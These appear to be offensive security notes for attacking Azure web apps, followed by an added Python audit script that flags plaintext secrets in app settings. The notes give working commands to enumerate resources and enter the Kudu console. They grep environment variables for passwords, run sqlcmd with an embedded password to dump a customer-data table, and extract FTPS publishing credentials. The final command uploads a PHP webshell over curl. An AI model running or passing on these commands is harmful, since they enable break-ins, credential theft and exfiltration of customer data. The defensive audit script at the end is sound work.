You probably need info from resource_enumeration first
Enumeration
Get info about a webapp resource
(Get-AzWebApp -ResourceGroupName 'group' -Name 'companyports-site').SiteConfig
Get-AzWebApp -Name megabigtechdevapp23
Static webapps:
Get info
az staticwebapp show --name 'name' --resource-group 'dat group'
Get settings (properties will sometimes contain sensitive info like conn strings)
az staticwebapp appsettings list --name 'name' --resource-group 'dat group'
Kudu / SCM
This is a separate dev container from prod that has the management stuff.
prod --> companyapp.azurewebsites.net
kudu/scm --> companyapp.scm.azurewebsites.net
You need the Website Contributor role to use it.
Exploitation
If you can log in, go to Debug ⇒ PowerShell. Then: managed_identity_and_apps
OR
Find connection strings etc.
env | findstr 'password'
Find DB? Do this from a PowerShell session on Kudu:
sqlcmd -S megabigdevsqlserver.database.windows.net -U dbuser -P 'V%#J3c5jceryjcE' -d customerdevneddb -Q "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'"
Read table
sqlcmd -S megabigdevsqlserver.database.windows.net -U dbuser -P 'V%#J3c5jceryjcE' -d customerdevneddb -Q "SELECT * FROM CustomerData"
Retrieve the FTPS deployment URL, username and password:
$webAppName = "<company-domain-portal>"
$resourceGroupName = "<groupname>"
$publishingProfileXml = [xml](Get-AzWebAppPublishingProfile -Name $webAppName -ResourceGroupName $resourceGroupName -OutputFile null)
$username = $publishingProfileXml.SelectSingleNode("//publishData/publishProfile[@publishMethod='MSDeploy']").userName
$password = $publishingProfileXml.SelectSingleNode("//publishData/publishProfile[@publishMethod='MSDeploy']").userPWD
$ftpsProfile = $publishingProfileXml.SelectSingleNode("//publishData/publishProfile[@publishMethod='FTP']")
$ftpsUrl = $ftpsProfile.publishUrl
$username
$password
$ftpsUrl
You can then upload a webshell or whatever you want via curl.
curl -T shell.php --ssl ftps://<company-domain-portal>.ftp.azurewebsites.windows.net/site/wwwroot/portal/shell.php --user '<PublishingUsername>'
Flames
Azure webapps have Defender OFF by default
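Audit for the app-settings exposure noted under Enumeration, added here as an example and not part of the original notes: it takes the JSON printed by `az staticwebapp appsettings list` (or `az webapp config appsettings list`) and reports settings stored as plaintext secrets rather than Key Vault references. The sample JSON, the setting names and the regexes are constructed assumptions; the two output shapes handled are the ones assumed for those commands.

```python
import json
import re

# Setting names that usually hold credentials (assumed naming habits).
SECRET_NAME = re.compile(r"(password|passwd|pwd|secret|token|api_?key|conn(ection)?_?str)", re.I)
# Value fragments typical of SQL / Storage / Service Bus connection strings.
SECRET_VALUE = re.compile(r"(Password|Pwd|AccountKey|SharedAccessKey|SharedAccessSignature)\s*=", re.I)
# Key Vault references are resolved at runtime, so the stored value is not the secret.
KEYVAULT_REF = re.compile(r"^@Microsoft\.KeyVault\(.*\)$", re.I)

# Constructed sample: static web app shape, settings under "properties".
STATIC_SAMPLE = json.dumps({"name": "appsettings", "properties": {
    "DB_CONN": "Server=tcp:example.database.windows.net;User ID=app;Password=CONSTRUCTED;",
    "API_TOKEN": "@Microsoft.KeyVault(SecretUri=https://example-vault.vault.azure.net/secrets/api-token/)",
    "FEATURE_FLAG": "on"}})
# Constructed sample: web app shape, a list of name/value entries.
WEBAPP_SAMPLE = json.dumps([
    {"name": "SMTP_PASSWORD", "slotSetting": False, "value": "constructed-value"},
    {"name": "WEBSITE_NODE_DEFAULT_VERSION", "slotSetting": False, "value": "~18"}])


def load_settings(raw):
    """Normalise both CLI output shapes into a {name: value} dict."""
    data = json.loads(raw)
    if isinstance(data, dict):
        return dict(data.get("properties") or {})
    return {item["name"]: item.get("value") or "" for item in data}


def audit(raw):
    """Return sorted (name, reason) pairs; values are never echoed back."""
    findings = []
    for name, value in load_settings(raw).items():
        value = str(value or "")
        if KEYVAULT_REF.match(value.strip()):
            continue
        if SECRET_VALUE.search(value):
            findings.append((name, "value looks like a connection string"))
        elif SECRET_NAME.search(name) and value:
            findings.append((name, "secret-like name with plaintext value"))
    return sorted(findings)


if __name__ == "__main__":
    for sample in (STATIC_SAMPLE, WEBAPP_SAMPLE):
        for name, reason in audit(sample):
            print(f"{name}: {reason}")
```

Anything it reports is readable by whoever can list app settings or open a Kudu session, so those values belong in Key Vault references with the stored credential rotated.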